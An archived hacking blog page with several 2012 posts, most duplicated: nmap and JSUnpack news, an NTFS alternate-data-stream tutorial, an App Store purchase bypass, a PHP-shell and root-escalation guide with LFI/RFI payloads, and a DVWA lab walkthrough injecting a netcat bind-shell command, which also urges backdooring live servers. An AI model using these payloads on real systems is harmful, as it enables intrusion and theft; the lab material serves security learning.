Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Wednesday 18 July 2012
Russian Hacker Bypasses Apple's App Store
A Russian hacker known as ZonD80 has discovered a method to retrieve apps from in-app for iOS apps free of cost. The best thing about this bypassing method is that this method does not require the i-device to be jailbroken. This method works on most of the major iOS versions from 3.0 to 6.0.
The step by step guide on using this method is available at the russian website HERE. The Russian guy has also setup a website called www.in-appstore.com.
Original Link
Watch Video About This Method
HERE is the copy of the instructions to follow.
*Take care while using this trick. I've not tested it and don't know if there are any security implications as the side effect of this bypass method.
Read more...
The step by step guide on using this method is available at the russian website HERE. The Russian guy has also setup a website called www.in-appstore.com.
Original Link
Watch Video About This Method
HERE is the copy of the instructions to follow.
*Take care while using this trick. I've not tested it and don't know if there are any security implications as the side effect of this bypass method.
Read more...
Bookmark this post: | 
|
Thursday 31 May 2012
JSUnpack - A Generic Javascript Unpacker
JSUnpack is an online service that can unpack different kinds of obfuscated and packed javascript source codes. It is designed for security researchers and computer professionals.
You can either supply the source code or link to the javascript file to unpack it. The site also supports uploading and unpacking of PDF, pcap, HTML, or JavaScript file.
JSUNPACK website
I hope it comes handy to you as it did to me. :)
Read more...
You can either supply the source code or link to the javascript file to unpack it. The site also supports uploading and unpacking of PDF, pcap, HTML, or JavaScript file.
JSUNPACK website
I hope it comes handy to you as it did to me. :)
Read more...
Bookmark this post: |
|
Tuesday 22 May 2012
NMAP 6 Released
Version 6 of nmap, one of the most widely used network exploration and security auditing tool was released on 21 May. Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing.
The nmap site says:
"The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 6.00 from http://nmap.org/. It is the product of almost three years of work, 3,924 code commits, and more than a dozen point releases since the big Nmap 5 release in July 2009. Nmap 6 includes a more powerful Nmap Scripting Engine, 289 new scripts, better web scanning, full IPv6 support, the Nping packet prober, faster scans, and much more! We recommend that all current users upgrade."
The new version of nmap consists of 6 major improvements among several changes. Enhanced Nmap scripting engine(NSE), better web scanning, full-fledged IPv6 support, addition of nping tool, better zenmap GUI and faster scanning are the enhancements seen in the version 6 of nmap.
More Release Information
Download NMAP
Read more...
The nmap site says:
"The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 6.00 from http://nmap.org/. It is the product of almost three years of work, 3,924 code commits, and more than a dozen point releases since the big Nmap 5 release in July 2009. Nmap 6 includes a more powerful Nmap Scripting Engine, 289 new scripts, better web scanning, full IPv6 support, the Nping packet prober, faster scans, and much more! We recommend that all current users upgrade."
The new version of nmap consists of 6 major improvements among several changes. Enhanced Nmap scripting engine(NSE), better web scanning, full-fledged IPv6 support, addition of nping tool, better zenmap GUI and faster scanning are the enhancements seen in the version 6 of nmap.
More Release Information
Download NMAP
Read more...
Bookmark this post: |
|
Tuesday 20 March 2012
Some Fun With Alternate Data Streams
I have not been blogging for a while because of exams but now I'm free for few days so here comes another post back from my home village. This time, I'm going to share some basic funs with alternate data streams from theory to some practical stuffs.
What is Alternate Data Stream Alternate Data Stream(ADS) is a kind of file system fork which allows more than one data stream to be associated with a single filename. Alternate Data Stream was introduced by Microsoft as a part of its NTFS file system. Alternate Data Streams are not shown by Windows Explorer and even the dir command and size of ADS is also excluded from the file size. The dir command however allows us to view the alternate data streams using the dir /R command in Windows Vista and above.
One use of ADS could be hiding the information as alternate data streams in the file but beware that copying the file to non-NTFS file systems will make you loose the information in the ADS. ADS was originally introduced to store file information and properties however any user can hide any kind of information in the ADS. Some malwares have utilized the ADS to hide their code so most antiviruses today also scan the ADS of any file to find anything fishy.
Note that the format used to create(and access) ADS is filename:ADSname. A relatively simple guide I had written a while ago is HERE.
Now lets move on to some interesting stuffs and for that, I am creating a directory named "samar" in Desktop. We will first create a simple text file by using the command below:
Now lets add an alternate data stream by issuing the following command:
Lets issue the dir command to see what it lists:
We can see no information regarding the alternate data stream we just added to the file and lets see if the type command shows anything by just opening the file.
So where is the private stuff we've put as ADS in the file? Even viewing the file from windows explorer does not show the content in ADS and of course the size is also not included. The point here is the malicious user might add something bad in the alternate data stream and send to a normal PC user. The unsuspecting user will not know if there's anything other than just the text file. Now lets see how we can see the alternate data stream.
For a while, lets pretend that we don't know that the ADS is added in the file. So first we will use the commands to see if there's any ADS in the file. The simplest one is to use dir /R command as below:
We can see that besides the ads.txt file, there is another entry ads.txt:private:$DATA. By examining this file, we come to know that the alternate data stream with the name private is present in the file ads.txt and the alternate data stream is nothing but just the data. However, as stated earlier, only Vista and above contain the dir command that lets us list the alternate data streams. In such case, you can download a small utility named streams from Microsoft Technet. The streams tool also allows us to delete the ADS easily which is possible but a bit obscure for normal PC user. Now to view the content of the alternate data stream, we will use notepad:
Note that this time we didn't use type command since it does not support the use of colon in the command. We used the notepad but we could also use another command known as more as below:
The fun with ADS just does not stop here. We could do much more than this but the basic idea is same. We can embed executables and codes within the ADS and run those executable whenever necessary. I'll leave this as homework for you guys since it won't be hard to figure it out once you've understood the basics I've discussed above.
The alternate data stream has already been exploited in IIS, the primary web server from Microsoft. Following is the example I've taken from OWASP on how it could be exploited in IIS.
Normal access:
http://www.alternate-data-streams.com/default.asp Show code bypass accessing the :$DATA alternate data stream:
http://www.alternate-data-streams.com/default.asp::$DATA
Last thing I would like to discuss is how to delete the alternate data streams. The streamers tool provides a -d switch to delete the ADS and it also supports the wildcards for deleting the streams. Another way of deleting the alternate streams is to copy the file in non-NTFS drives such as to FAT32-formatted pendrives and then copying back. Of course, you could also save the content of main stream in another file and then delete the original file that consists of stream.
I hope this helps you. Please let me know if I should add something to it. :)
Read more...
What is Alternate Data Stream Alternate Data Stream(ADS) is a kind of file system fork which allows more than one data stream to be associated with a single filename. Alternate Data Stream was introduced by Microsoft as a part of its NTFS file system. Alternate Data Streams are not shown by Windows Explorer and even the dir command and size of ADS is also excluded from the file size. The dir command however allows us to view the alternate data streams using the dir /R command in Windows Vista and above.
One use of ADS could be hiding the information as alternate data streams in the file but beware that copying the file to non-NTFS file systems will make you loose the information in the ADS. ADS was originally introduced to store file information and properties however any user can hide any kind of information in the ADS. Some malwares have utilized the ADS to hide their code so most antiviruses today also scan the ADS of any file to find anything fishy.
Note that the format used to create(and access) ADS is filename:ADSname. A relatively simple guide I had written a while ago is HERE.
Now lets move on to some interesting stuffs and for that, I am creating a directory named "samar" in Desktop. We will first create a simple text file by using the command below:
echo An ordinary text file > ads.txt
Now lets add an alternate data stream by issuing the following command:
echo I am secret > ads.txt:private.txt
Lets issue the dir command to see what it lists:
Volume in drive C has no label.
Volume Serial Number is 90E7-CBCA
Directory of C:\Users\SINDHUS\Desktop\samar
03/20/2012 09:58 AM <DIR> .
03/20/2012 09:58 AM <DIR> ..
03/20/2012 09:56 AM 24 ads.txt
3 File(s) 24 bytes
3 Dir(s) 22,683,332,608 bytes free
We can see no information regarding the alternate data stream we just added to the file and lets see if the type command shows anything by just opening the file.
C:\Users\SINDHUS\Desktop\samar>type ads.txt
An ordinary text file
An ordinary text file
So where is the private stuff we've put as ADS in the file? Even viewing the file from windows explorer does not show the content in ADS and of course the size is also not included. The point here is the malicious user might add something bad in the alternate data stream and send to a normal PC user. The unsuspecting user will not know if there's anything other than just the text file. Now lets see how we can see the alternate data stream.
For a while, lets pretend that we don't know that the ADS is added in the file. So first we will use the commands to see if there's any ADS in the file. The simplest one is to use dir /R command as below:
C:\Users\SINDHU'S\Desktop\samar>dir /R
Volume in drive C has no label.
Volume Serial Number is 90E7-CBCA
Directory of C:\Users\SINDHU'S\Desktop\samar
03/20/2012 09:58 AM <DIR> .
03/20/2012 09:58 AM <DIR> ..
03/20/2012 09:56 AM 24 ads.txt
14 ads.txt:private.txt:$DATA
03/20/2012 09:58 AM 496 info.txt
2 File(s) 520 bytes
3 Dir(s) 22,881,669,120 bytes free
We can see that besides the ads.txt file, there is another entry ads.txt:private:$DATA. By examining this file, we come to know that the alternate data stream with the name private is present in the file ads.txt and the alternate data stream is nothing but just the data. However, as stated earlier, only Vista and above contain the dir command that lets us list the alternate data streams. In such case, you can download a small utility named streams from Microsoft Technet. The streams tool also allows us to delete the ADS easily which is possible but a bit obscure for normal PC user. Now to view the content of the alternate data stream, we will use notepad:
C:\Users\SINDHUS\Desktop\samar>notepad ads.txt:private.txt
Note that this time we didn't use type command since it does not support the use of colon in the command. We used the notepad but we could also use another command known as more as below:
C:\Users\SINDHU'S\Desktop\samar>more < ads.txt:private
I am secret
I am secret
The fun with ADS just does not stop here. We could do much more than this but the basic idea is same. We can embed executables and codes within the ADS and run those executable whenever necessary. I'll leave this as homework for you guys since it won't be hard to figure it out once you've understood the basics I've discussed above.
The alternate data stream has already been exploited in IIS, the primary web server from Microsoft. Following is the example I've taken from OWASP on how it could be exploited in IIS.
Normal access:
http://www.alternate-data-streams.com/default.asp Show code bypass accessing the :$DATA alternate data stream:
http://www.alternate-data-streams.com/default.asp::$DATA
Last thing I would like to discuss is how to delete the alternate data streams. The streamers tool provides a -d switch to delete the ADS and it also supports the wildcards for deleting the streams. Another way of deleting the alternate streams is to copy the file in non-NTFS drives such as to FAT32-formatted pendrives and then copying back. Of course, you could also save the content of main stream in another file and then delete the original file that consists of stream.
I hope this helps you. Please let me know if I should add something to it. :)
Read more...
Bookmark this post: |
|
Tuesday 28 February 2012
List of Hashing Algorithms Used In Major CMS & Forums
Just found this random image from one digital friend and its a pretty good list of hashing algorithms used in many web based applications such as CMS and forum softwares. Some of these algorithms might get outdated with newer versions, but still it will be a good reference.
View Full Size Image
Note for creator: If you are the owner of this image, please let me know so that I can give you the credit.
Read more...
View Full Size Image
Note for creator: If you are the owner of this image, please let me know so that I can give you the credit.
Read more...
Bookmark this post: |
|
Thursday 16 February 2012
Art of hacking 4 - spyd3rm4n's guide to hacking
Well this is the part 4 of the art of hacking series I've been posting here. Since the original site dmz has been down since long time, I have been uploading these tutorials. This part of tutorial explains what a PHP shell is and how you can use the php shell to gain the root access in the servers.
[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root
Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}
Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.
The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.
Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.
This will show the passwd on the linux box. Giving you directory listing for every user on it.
This will include the evilshell.php located at anothersite.com
Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like
include();
@include();
as long as the include() function includes user input, like
This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);
^ Jackpot.
Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:
Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.
That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.
Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:
There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)
Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.
Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}
- Credits : Kr3w of TheDefaced.
Read more...
[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root
Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}
Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.
The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.
Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.
http://site.com/index.php?page=../../../../../etc/passwd
This will show the passwd on the linux box. Giving you directory listing for every user on it.
http://site.com/index.php?page=http://anothersite.com/evilshell.php
This will include the evilshell.php located at anothersite.com
Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like
include();
@include();
as long as the include() function includes user input, like
$page = $_GET['page'];
This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);
^ Jackpot.
Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:
Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.
That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.
Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:
There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)
Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.
Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}
- Credits : Kr3w of TheDefaced.
Read more...
Bookmark this post: |
|
Tuesday 14 February 2012
Hacking Step by Step For Beginners [Guest Post]
This article is an excellent step-by-btep tutorial for those who want to be hackers. Don't expect it to teach you step-wise process of hacking a website or an e-mail address. Instead, this tutorial is aimed to help you how you should proceed to really understand the computer systems so that you become a real computer hacker.
Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.
Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...
[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.
[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).
[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.
[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.
[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.
[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.
[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!
[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.
[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.
[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.
[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!
[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).
[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.
[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.
[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!
This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...
True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!
Reference and Copies:
17 Steps to Hack
Ubuntards
some cools stuff which i can't remember
Read more...
"How do you hack"? "I wanna to learn hacking". "How to get started"?
"How can I get the password"? "How do I crack "?
Does this sound like you? who needs to learn how to hack? And nobody
will even speak to you much less send you any info???
Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.
Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...
[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.
[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).
[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.
[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.
[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.
[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.
[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!
[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.
[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.
[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.
[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!
[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).
[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.
[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.
[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!
This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...
True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!
Reference and Copies:
17 Steps to Hack
Ubuntards
some cools stuff which i can't remember
The article was originally contributed by rhoit in the foss-nepal mailing list.
Read more...
Bookmark this post: |
|
Thursday 2 February 2012
Command Execution Vulnerability - Damn Vulnerable Web App Part 2
We had earlier worked out the bruteforce vulnerability in dvwa in part 1 of the series of articles on dvwa. Today, in this second part, we will be exploiting the command execution vulnerability within dvwa.
A bit about command execution: Command execution vulnerability is common in PHP-based and other web applications in which malicious attacker can inject the system level commands or codes that will get executed by the call to the system functions. This happens due to the lack of proper sanitization of the user input. Once again it proves the fact that Never trust user data. In our example, we will see direct command execution in the web server caused due to lack of input sanitization before calling the potentially unsafe function.
1) Lets login with our login information and click on the "Command Execution" item in the left navigation menu.
2) A HTML form with "Ping for free" will be available for you. So the input box wants IP address as the input and probably makes use of some system function such as shell_exec() or exec() or maybe system() to ping to the given IP address. First lets test if ping really works or not by typing "127.0.01" in the input textbox. Well we get the ping response and hence we come to know that some kind of system level function is being used to execute the ping command.
3) We have concluded that some PHP in-built function is being used to execute the ping command in the server so use of such functions opens the possibility of injection of our own commands if the input we give is not being filtered. In our case, IP address is the possible input we can play with to find the possible vulnerability. Lets try to tamper the input so I will give "127.0.0.1;ls -lia" (without quotes) as the input and we will check the output to know if our supplied command(ls -lia) gets executed or not. As the screenshot suggests, our command was successfully injected and we were able to see the output of "ls -lia" command.
4) The injected command in the previous step gave us the directory listing but we are hackers and we would like to get some shell access to the system so lets make use of the netcat to get simple shell to the system. Now lets inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes) which will create a FIFO(named pipe) in the filesystem so that two processes can access the same pipe(Interprocess communication becomes possible).
5) Now lets see if we got the shell or not by trying to connect to the web server. Now lets fire up the terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get the shell access and bingo!!! we got the shell access.
6)Now you can do whatever you want to do in the webserver. You could install backdoors for further access if you find such vulnerability in the live servers. Actually possibilities are unlimited, its up to your imagination and creativity once you get shell on the remote server.
Now lets check the source code of the vulnerable file:
As we can see, shell_exec() function is taking the $target variable as the input which actually is supplied by user as the $_REQUEST['ip'] and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time when you are auditing source code, be sure to check arguments passed to such functions and you might be able to spot remote command execution in many PHP scripts.
I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.
Part 1 - Bruteforce Vulnerability
Read more...
A bit about command execution: Command execution vulnerability is common in PHP-based and other web applications in which malicious attacker can inject the system level commands or codes that will get executed by the call to the system functions. This happens due to the lack of proper sanitization of the user input. Once again it proves the fact that Never trust user data. In our example, we will see direct command execution in the web server caused due to lack of input sanitization before calling the potentially unsafe function.
1) Lets login with our login information and click on the "Command Execution" item in the left navigation menu.
2) A HTML form with "Ping for free" will be available for you. So the input box wants IP address as the input and probably makes use of some system function such as shell_exec() or exec() or maybe system() to ping to the given IP address. First lets test if ping really works or not by typing "127.0.01" in the input textbox. Well we get the ping response and hence we come to know that some kind of system level function is being used to execute the ping command.
3) We have concluded that some PHP in-built function is being used to execute the ping command in the server so use of such functions opens the possibility of injection of our own commands if the input we give is not being filtered. In our case, IP address is the possible input we can play with to find the possible vulnerability. Lets try to tamper the input so I will give "127.0.0.1;ls -lia" (without quotes) as the input and we will check the output to know if our supplied command(ls -lia) gets executed or not. As the screenshot suggests, our command was successfully injected and we were able to see the output of "ls -lia" command.
4) The injected command in the previous step gave us the directory listing but we are hackers and we would like to get some shell access to the system so lets make use of the netcat to get simple shell to the system. Now lets inject the command "127.0.0.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe" (without quotes) which will create a FIFO(named pipe) in the filesystem so that two processes can access the same pipe(Interprocess communication becomes possible).
5) Now lets see if we got the shell or not by trying to connect to the web server. Now lets fire up the terminal and type the "nc 127.0.0.1 13371" (without quotes) command. If everything has gone well, we should get the shell access and bingo!!! we got the shell access.
6)Now you can do whatever you want to do in the webserver. You could install backdoors for further access if you find such vulnerability in the live servers. Actually possibilities are unlimited, its up to your imagination and creativity once you get shell on the remote server.
Now lets check the source code of the vulnerable file:
<?php
if( isset( $_POST[ 'submit' ] ) ) {
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) {
$cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.$cmd.'</pre>';
} else {
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.$cmd.'</pre>';
}
}
?>
As we can see, shell_exec() function is taking the $target variable as the input which actually is supplied by user as the $_REQUEST['ip'] and there isn't any kind of validation of the $target variable. We were hence able to exploit the application through this variable. Next time when you are auditing source code, be sure to check arguments passed to such functions and you might be able to spot remote command execution in many PHP scripts.
I hope this little guide works as a walkthrough for learning basics of web hacking with DVWA. Next part will be up soon.
Part 1 - Bruteforce Vulnerability
Read more...
Bookmark this post: |
|
Subscribe to:
Posts (Atom)